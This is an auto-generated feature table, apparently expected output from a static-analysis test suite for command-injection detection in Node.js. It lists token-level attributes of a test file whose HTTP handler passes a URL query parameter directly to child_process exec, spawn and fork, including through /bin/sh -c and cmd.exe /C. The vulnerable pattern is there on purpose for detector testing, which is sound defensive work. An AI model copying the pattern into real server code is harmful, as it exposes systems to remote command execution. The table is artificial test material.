autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:8:20:19 | execFileSync | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:8:20:19 | execFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:8:20:19 | execFileSync | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:21:20:23 | cmd | CalleeFlexibleAccessPath | cp.execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:21:20:23 | cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:21:20:23 | cmd | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:21:20:23 | cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:21:20:23 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:21:20:23 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:21:20:23 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:21:20:23 | cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:20:21:20:23 | cmd | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:5:21:6 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:5:21:6 | cp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:5:21:6 | cp | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:5:21:6 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:5:21:6 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:5:21:12 | cp.spawn | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:5:21:12 | cp.spawn | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:5:21:12 | cp.spawn | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:5:21:12 | cp.spawn | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:5:21:12 | cp.spawn | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:5:21:17 | cp.spawn(cmd) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:5:21:17 | cp.spawn(cmd) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:5:21:17 | cp.spawn(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:5:21:17 | cp.spawn(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:5:21:17 | cp.spawn(cmd) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:5:21:17 | exceptional return of cp.spawn(cmd) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:5:21:17 | exceptional return of cp.spawn(cmd) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:5:21:17 | exceptional return of cp.spawn(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:5:21:17 | exceptional return of cp.spawn(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:5:21:17 | exceptional return of cp.spawn(cmd) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:8:21:12 | spawn | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:8:21:12 | spawn | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:8:21:12 | spawn | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:8:21:12 | spawn | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:8:21:12 | spawn | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:14:21:16 | cmd | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:14:21:16 | cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:14:21:16 | cmd | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:14:21:16 | cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:14:21:16 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:14:21:16 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:14:21:16 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:14:21:16 | cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:21:14:21:16 | cmd | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:5:22:6 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:5:22:6 | cp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:5:22:6 | cp | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:5:22:6 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:5:22:6 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:5:22:16 | cp.spawnSync | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:5:22:16 | cp.spawnSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:5:22:16 | cp.spawnSync | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:5:22:16 | cp.spawnSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:5:22:16 | cp.spawnSync | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:5:22:21 | cp.spawnSync(cmd) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:5:22:21 | cp.spawnSync(cmd) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:5:22:21 | cp.spawnSync(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:5:22:21 | cp.spawnSync(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:5:22:21 | cp.spawnSync(cmd) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:5:22:21 | exceptional return of cp.spawnSync(cmd) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:5:22:21 | exceptional return of cp.spawnSync(cmd) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:5:22:21 | exceptional return of cp.spawnSync(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:5:22:21 | exceptional return of cp.spawnSync(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:5:22:21 | exceptional return of cp.spawnSync(cmd) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:8:22:16 | spawnSync | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:8:22:16 | spawnSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:8:22:16 | spawnSync | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:8:22:16 | spawnSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:8:22:16 | spawnSync | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:18:22:20 | cmd | CalleeFlexibleAccessPath | cp.spawnSync | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:18:22:20 | cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:18:22:20 | cmd | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:18:22:20 | cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:18:22:20 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:18:22:20 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:18:22:20 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:18:22:20 | cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:22:18:22:20 | cmd | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:5:23:6 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:5:23:6 | cp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:5:23:6 | cp | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:5:23:6 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:5:23:6 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:5:23:11 | cp.fork | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:5:23:11 | cp.fork | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:5:23:11 | cp.fork | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:5:23:11 | cp.fork | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:5:23:11 | cp.fork | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:5:23:16 | cp.fork(cmd) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:5:23:16 | cp.fork(cmd) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:5:23:16 | cp.fork(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:5:23:16 | cp.fork(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:5:23:16 | cp.fork(cmd) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:5:23:16 | exceptional return of cp.fork(cmd) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:5:23:16 | exceptional return of cp.fork(cmd) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:5:23:16 | exceptional return of cp.fork(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:5:23:16 | exceptional return of cp.fork(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:23:5:23:16 | exceptional return of cp.fork(cmd) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | 